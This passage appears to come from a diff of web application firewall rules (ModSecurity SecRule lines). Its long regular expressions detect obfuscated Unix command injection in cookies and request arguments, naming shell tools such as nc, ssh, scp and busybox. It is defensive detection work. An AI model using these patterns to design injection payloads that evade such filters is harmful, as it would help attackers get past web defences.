?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?E[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?T|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[gr])|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cdgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[chr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[ghu]|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|[co][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|l)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[bx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cdgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[chr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:p|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cp]|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_